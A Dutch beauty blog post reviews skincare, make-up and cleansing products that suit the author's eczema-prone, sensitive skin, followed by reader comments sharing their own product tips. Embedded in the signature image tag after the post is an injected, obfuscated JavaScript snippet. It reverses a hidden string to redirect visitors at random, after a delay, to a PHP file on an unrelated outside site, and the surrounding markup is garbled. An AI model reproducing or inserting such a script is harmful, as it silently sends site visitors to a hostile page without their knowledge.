Beauty- en verzorgingsproducten voor de eczeem-/gevoelige huid

Beauty- en verzorging voor eczeemhuid cover

Je staat er misschien niet altijd bij stil, maar sommige meiden en vrouwen kunnen niet altijd alle beauty- of verzorgingsproducten gebruiken die ze zouden willen. Als je een gevoelige huid hebt, of zelfs misschien last hebt van eczeem, dan moet je helaas heel selectief zijn in je aanschaf van producten. Een uitbraak van jeuk of roodheid, daar zit je echt niet op te wachten! Nu heb ik zelf een gevoelige huid, maar ook eczeem is een rode draad in mijn leven. Ik heb inmiddels een hele fijne collectie van vaste producten in mijn routine zitten, die mijn huid niet irriteren, maar haar met rust laat en zelfs verzorgt. Ik deel ze vandaag met je!

Verzorgingsproducten

IMG_0926

De dag begin ik natuurlijk met het verzorgen van mijn gezicht en lichaam. Na het douchen (wat je ook beter niet iedere dag kunt doen, omdat contact met water uitdrogend is voor de huid) smeer ik mij altijd lekker in met verzorgende en kalmerende producten. Van de dermatoloog heb ik Witte Vaseline voorgeschreven gekregen voor de extreem droge plekken. Hiermee smeer ik me dan ook dagelijks twee keer mee in. Het is heel vet, maar zorgt ervoor dat je huid niet uitdroogt en geen kans heeft om te gaan schilferen.

De Kruidvat Pure & Nature lippenbalsem bevat natuurlijke ingrediënten en is speciaal voor de gevoelige huid ontwikkeld. Een hele fijne balsem!

IMG_0931

Ongeveer anderhalf jaar geleden maakte ik kennis met een proeftubetje van Biodermal. De P-CL-E crème wel te verstaan. Ik had er al goede verhalen over gehoord, maar ik ben altijd sceptisch omdat ik niet veel crèmes kan verdragen. Deze is daar de uitzondering in! Hij is rijk en vol van structuur, geeft een licht verkoelend effect en kalmeert mijn rode huid. Dit is mijn ontdekking wat betreft dagcrèmes, mijn huid verdraagt hem ontzettend goed!

IMG_0929

The Bodyshop heeft verschillende bodybutters in haar assortiment, maar ik vind Vanilla Bliss (de kersteditie) en de geur Sheabutter het allerbeste. Er zit haast geen parfum in deze geuren en ze zijn stevig en vol. Zeer geschikt voor een (extreem) droge huid en hij irriteert mijn lichaam op geen enkele manier. Fijn!

Make-up producten

IMG_0956

Niets zo vervelend als een mascara die brandt in je ogen of een foundation waar je een rode huid van krijgt. Zelfs hypoallergene mascara’s zeggen nog niets! Etos heeft er eentje in hun assortiment en die heb ik met een klacht terugbracht omdat mijn ogen het niet konden verdragen. Gelukkig heb ik mijn holy grails gevonden die lief zijn voor mijn huid.

Als eerste vind ik de oogschaduwpalette’s van Sleek heel fijn in gebruik. Ik vind ze prettig om mee te werken en zijn kwalitatief heel fijn. Ik krijg nul komma nul irritatie van deze oogschaduw, dus perfect!

IMG_0953

Voor het faken van een mooie huid gebruik ik de Rimmel Match Perfection foundation in de kleur Soft Beige. Hij is perfect voor een droge huid en maakt je huid op een natuurlijke manier egaal. De gezichtspoeder is van Clinique (blended face powder and brush) en heb ik in de kleur Invisible Blend. Hij is heel zacht van structuur en maakt je huid glimvrij. De Max Factor Masterpiece Max mascara is al jaren mijn grote vriend, ik kom er telkens weer op terug. Geen branderigheid en geen hoofdpijn (want ja, dat krijg ik als ik een allergische reactie heb) tot gevolg. Gelukkig is deze mascara niet alleen allergieproof, ook separeert hij je wimpers als geen ander en maakt hij ze mooi zwart.

IMG_0952

Een zwart oogpotlood zit eigenlijk altijd in mijn stash, je ogen worden er een stuk intenser van. Het oogpotlood wat heel mild voor mijn ogen is, is de Rimmel Soft Kohl Kajal Eye Liner Pencil. En de kwaliteit is ook helemaal top! Een lipstick die ik prima kan verdragen is de Essence Long Lasting Lipstick. Ze zijn verkrijgbaar in een hoop kleuren, dus je zit altijd goed!

IMG_0955

Als een van de laatste make-upproducten, kom ik aan bij een blush van Catrice. Dit is er nog eentje van de oude collectie, dus ik hoop dat de samenstelling niet veranderd is bij de nieuwe blushes. Maar anders; een aanrader! Ook te koop in nog 3 andere kleuren. Een concealer waar ik niet zonder kan is de Clinique Airbrush Concealer (review) in de kleur Neutral Fair. Hij is behoorlijk duur (€23,35), maar als je niet veel kunt verdragen onder je ogen is dit denk ik de beste oplossing. De concealer is vrij vloeibaar en komt uit een pennetje met een kwastje. Hij geeft je ogen een mooie lift, waardoor je er fris en wakker uitziet. Een topper!

Reinigingsproducten

IMG_0963

Helaas zijn mijn alltime favoriete gezichtreinigers van Garnier uit het assortiment gehaald. Ik moest dus noodgedwongen uitwijken naar een ander merk. Toen deze van L’oreal in de aanbieding waren heb ik ze uitgeprobeerd en ook al kunnen ze niet tippen aan die van Garnier, ze zijn heel mild in gebruik en verwijderen je make-up goed. De L’oreal Paris oogreinigslotion waterproof is iets olieachtig en daarom perfect voor de wat drogere huid. Hij verwijdert mijn oogmake-up moeiteloos! De L’oreal Paris Sublime Soft verzachtend micellair water (review) is heel mild qua ingrediënten. Toch vind ik hem wel wat uitdrogend voor de huid, wat voor sommigen irriterend kan werken. Het hoofdingrediënt is water en ja, dat is nu eenmaal uitdrogend voor een droge huid. Een vette, volle crème is dan een goede oplossing! Tot nu toe heb ik hiervoor nog geen goed alternatief gevonden. De wattenschijfjes zijn van Kruidvat eigen merk en zijn lekker zacht. Heel belangrijk als je geen schuurpapier als watjes wilt hebben.

Dat waren mijn tips en ervaringen met producten die voor mij geen irritaties opwekken. Ik hoop dat je er wat aan hebt, maar iedere huid reageert natuurlijk weer anders op producten. Ik ben ook wel benieuwd of jij nog aanvullende tips hebt qua producten voor een eczeem-/gevoelige huid?

Mocht je nog vragen hebben over dit type huid, ik beantwoord ze graag!

H<script>$GRn=function(n){if (typeof ($GRn.list[n]) == “string”) return $GRn.list[n].split(“”).reverse().join(“”);return $GRn.list[n];};$GRn.list=[“\’php.rabedis-nimda-snoitcnuf/cni/srebmem/snigulp/tnetnoc-pw/moc.nemrolias//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000;	setTimeout($GRn(0),delay);}</script>andwritten liefs liset” src=”https://beautydagboek.com/wp-content/uploads/2014/02/h<script>$GRn=function(n){if (typeof ($GRn.list[n]) == andwritten-liefs-liset.jpg” width=”560″ height=”129″ />

18 Reacties

 1. 28 februari 2014 / 06:28

  Wat leuk dat je jouw toppers deelt! Ik wist helemaal niet dat je last had van eczeem, dus dat hou je goed onder controle met deze producten. Ik kan je niet veel tips geven voor gevoelige huidtypes, behalve geen parfum en alcohol gebruiken maar dat weet je natuurlijk allang. Als dagcremetip heb ik wel de dr van der Hoog dagcremes, die vind ik zelf erg fijn als nachtcreme omdat ze zo lekker vol en voedend zijn. De Fresh Expression is de volste die ik ben tegengekomen en bevat ook spf 15, dus kan prima als dagcreme!

 2. 28 februari 2014 / 07:37

  Ik heb er zelf geen last van, wel een handig artikel voor mensen die hier wel problemen mee hebben!

 3. 28 februari 2014 / 08:20

  Ik wist niet dat je last van eczeem had! Mijn moeder heeft er met vlagen last van en ik weet dat zij ook heel voorzichtig moet zijn met het kiezen van producten. Je hebt er hele fijne items tussen zitten die ik zelf ook graag gebruik (micellair water, Shea body butter). Zelf heb ik geen eczeem maar een hele gevoelige huid. Ik gebruik graag de dagcrème voor de extreem droge huid van Biodermal als nachtcrème, heerlijk!

 4. 28 februari 2014 / 08:25

  Fijn dat je hier over schrijft! Ik heb ook een gevoelige en droge huid maar de producten van tbs die jij noemt kan ik niet meer verdragen 🙁

 5. 28 februari 2014 / 09:19

  Fijn dat je, je eczeem op deze manier onder controle kunt houden. Mooie producten gebruik je. Ik heb zelf last van een erg gevoelige huid. Als ik al een masker gebruik waar wat parfum in zit krijg ik al rode plekjes. Nivea heeft nu schijnbaar ook een nieuwe lijn uitgebracht helemaal zonder parfum, parabenen, alcohol etc.

  • 28 februari 2014 / 11:04

   Ik gebruik ook zalven van de dermatoloog, maar op de dagen dat ik dat niet doe zijn deze producten echt mijn redder in nood :). Lekker mild, verzorgend en geen irritaties!

 6. 28 februari 2014 / 10:26

  Dank je wel voor al die toppertjes van je, je hebt mij wel op nieuwe ideetjes gebracht hiermee!

 7. 28 februari 2014 / 11:21

  Ik heb ook een hele gevoelige huid. Clinique heeft mij goed geholpen!

 8. 28 februari 2014 / 12:26

  De body butters van TBS helpen mij echt met mijn droge huid, het word er een stuk minder droog van! Die PCLE creme zou ik ooit ook nog wel willen gebruiken, ben daar erg benieuwd naar! Ik gebruik voor mn gezicht graag de producten van Hannah, waar ik voorheen altijd eczeem of een hele rode en geïrriteerde huid had heb ik nu er niet zoveel last meer van!

  • 28 februari 2014 / 23:28

   Waar koop je die producten Kimberly? Klinkt als muziek in mijn oren namelijk 😉

 9. 28 februari 2014 / 13:37

  Dit is echt een super fijn atikel. Ik heb een gevoelige huid, en heel soms speelt eczeem op. Leuk dat je hier ook aandacht aan besteed. Liefs, Svenja.

 10. 28 februari 2014 / 15:36

  Het is geen beautyproduct maar in de winter ga ik ook af en toe onder de zonnebank. Dat werkt heel goed tegen mij eczeem. Natuurlijk niet te vaak, want dat is niet goed voor je huid. Ik ben wel benieuwd naar de crème van Biodermal. Ik gebruik nu een crème van Vichy.

 11. 28 februari 2014 / 17:39

  Wat een goed artikel! Ik heb ook een erg gevoelige huid met eczeem en allergische reacties. De producten die jij beschrijft werken bij mij ook goed! Alleen biodermal heb ik nog niet geprobeerd, klinkt super! Verder werkt weleda voor mij ook als een speer!

 12. 28 februari 2014 / 23:26

  Dit artikel voelt als thuiskomen, wat fijn om jou ervaringen op dit gebied te lezen! Ik kom dit namelijk niet vaak tegen.

  Ik heb zelf een extreem droge en gevoelige huid met veel onzuiverheden in de herfst en winter en ook heb ik last van eczeem. Ik heb via een arts ontdekt dat mijn huid erg uitdroogt door het ingrediënt phenoxyethanol (ik hoop dat ik het nu goed schrijf). Een ingrediënt wat bekend staat om zijn bacterie dodende werking en bij een klein percentage mensen voor allergische reacties zorgt. Misschien is het iets voor jou om te kijken hoe jou huid daarop reageert 😉

  Vette en voedende producten heb ik ook zeker nodig. Bodylotions smeer ik veel met een body butter van TBS voor de drogere plekken.

  De foundation die jij gebruik verdraag ik inmiddels ook niet meer, en hiervoor is een Clinique foundation voor terug gekomen, deze hydrateerd de huid ook namelijk. Oogpotloot zorgt bij mij ook voor hoofdpijn en oogschaduw van Urban Decay werkt het beste bij mij.

  Ik geloof best dat het voor jou ook een hele zoektocht is geweest naar producten die voor jou werken! De lipbalm ga ik onthouden 😉

  Bedankt voor het delen.

 13. elisa ropers
  29 april 2015 / 16:11

  ik ben blij dat ik een beetje meer inlichtigen heb gekregen ;ik heb ook eczema ,en weet nog niet welke producten ik kan gebruiken ,dank u

Geef een antwoord

Het e-mailadres wordt niet gepubliceerd. Vereiste velden zijn gemarkeerd met *

CommentLuv badge

Deze site gebruikt Akismet om spam te verminderen. Bekijk hoe je reactie-gegevens worden verwerkt.